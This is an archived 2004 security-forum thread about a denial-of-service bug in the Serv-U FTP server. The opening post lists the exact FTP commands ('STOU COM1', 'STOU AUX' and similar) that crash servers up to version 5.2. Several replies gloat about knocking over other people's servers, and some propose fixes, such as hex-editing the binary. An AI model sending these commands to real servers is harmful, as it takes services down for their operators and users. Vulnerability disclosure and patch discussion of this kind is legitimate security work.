hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
easternerd
Sep 12 2004, 06:05 PM
Serv-U up to 5.2 Denial of Service [eXploit]



Serv-U FTP server is a secure, advanced FTP server for Windows. However, like most programs, it is not completely bugfree.

I (and maybe more people with me) found this bug some time ago.
It can be triggered as *every* user that can log in, anonymous included,
and exists in possibly every version. (At least 4.x and 5.x series)

The exploit might be a cliché but it might threaten (hosting and other)
companies that use this FTP server.

Following commands will trigger the crash:

STOU COM1
STOU LPT1
STOU PRN
STOU AUX

However, "STOU NUL" does NOT work.
MxMx
Sep 12 2004, 06:30 PM
omg omg omg sad.gif

all the lamers will raise and kill our ftp servers unsure.gif
THoRaX
Sep 12 2004, 06:32 PM
QUOTE (MxMx @ Sep 12 2004, 06:30 PM)
omg omg omg sad.gif

all the lamers will raise and kill our ftp servers unsure.gif

won't work on users that can only download..

550 permission denied

so no big deal..
MxMx
Sep 12 2004, 06:36 PM
not true ..

it worked on my local servu .. ive tried it with anonymous access .. it still killed my servu version 5.2 ph34r.gif
THoRaX
Sep 12 2004, 06:40 PM
QUOTE (MxMx @ Sep 12 2004, 06:36 PM)
not true ..

it worked on my local servu .. ive tried it with anonymous access .. it still killed my servu version 5.2 ph34r.gif

holy cow, tried it on another server, and works ohmy.gif
could be horrible blink.gif
MxMx
Sep 12 2004, 06:44 PM
told you ..

this damn simple mfing command is going to destroy the fxp world for now I think dry.gif
MxMx
Sep 12 2004, 06:47 PM
Its best to delete this topic immediately I think ..
its good that you found this bug .. but a disaster for stro builders and although this isnt a hack forum.. all of us know that this place is filled with stro building kiddies .. sad.gif
Axl
Sep 12 2004, 07:03 PM
h3h3h3

finally somebody published it,ive been messing around with it-crashing fxp dumps and stuff since 2.5 was released...

nice bug...

there are more ways to crash serv-u,dig into the user manual and u are bound to find more.

F*ck the fxp scene ! f*ck lame fxp kiddies !DIEEE !!
mathofaka
Sep 12 2004, 07:08 PM
h4h4 this is gona be interasting blink.gif
Axl
Sep 12 2004, 07:08 PM
h5h5h5

yes indeed tongue.gif
BuzzDee
Sep 12 2004, 07:54 PM
h6h6h6 (sry that one had to be =) nice bug easternend biggrin.gif
101
Sep 12 2004, 08:36 PM
QUOTE (MxMx @ Sep 12 2004, 06:47 PM)
Its best to delete this topic immediately I think ..


Original advisorie:

CODE

http://www.SecurityTracker.com/alerts/2004/Sep/1011219.html


you should delete this website then ... laughing out loud
MxMx
Sep 12 2004, 08:41 PM
QUOTE (101 @ Sep 12 2004, 08:36 PM)
QUOTE (MxMx @ Sep 12 2004, 06:47 PM)
Its best to delete this topic immediately I think ..


Original advisorie:

CODE

http://www.SecurityTracker.com/alerts/2004/Sep/1011219.html


you should delete this website then ... laughing out loud

omg blink.gif cool.gif
night^man
Sep 12 2004, 08:42 PM
crazy bug tongue.gif
Ecko
Sep 12 2004, 09:09 PM
coded a exploit wink.gif

kidz stop lame fxp shit...

CODE

- look @ file download


add it in a txt file with name Serv-U.pl

have fun tongue.gif
BuzzDee
Sep 12 2004, 10:44 PM
even every lame fxp kiddie should know how to "patch" this oh-so-damn-dangerous bug.

just hex edit ur servu.exe wink.gif

look - i replaced the T with an M in the exe of my homeftp:

CODE

STOU AUX
500 'STOU': Kommando nicht verstanden.
STOU COM1
500 'STOU': Kommando nicht verstanden.
SMOU COM1
Connection lost: 127.0.0.1


so nobody will DoS my homie and your 1337 haXXor Str0s will keep workin, too...

greetz ph34r.gif
nackas
Sep 13 2004, 06:27 AM
Ahh nice BuzzDee, was trying to think of a fix for the problem..
*goes off to do some hex editing happy.gif*
dont-staY
Sep 13 2004, 10:54 AM
Rhinosoft should make an update for Serv-U as fast as possible or they will loose many customers, i think dry.gif

Really crazy bug ...
Hellraiseruk
Sep 13 2004, 11:51 AM
we need serv-u to bring a patch out or something..any other way to stop this rather than hex editing?
101
Sep 13 2004, 12:04 PM
QUOTE (Hellraiseruk @ Sep 13 2004, 11:51 AM)
we need serv-u to bring a patch out or something..any other way to stop this rather than hex editing?


http://www.governmentsecurity.org/forum/in...iew=getlastpost

FTPServerTools posted a patch method.
Hellraiseruk
Sep 13 2004, 12:06 PM
i don't have a "ServuEvent.dll " or does he mean the .ini?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.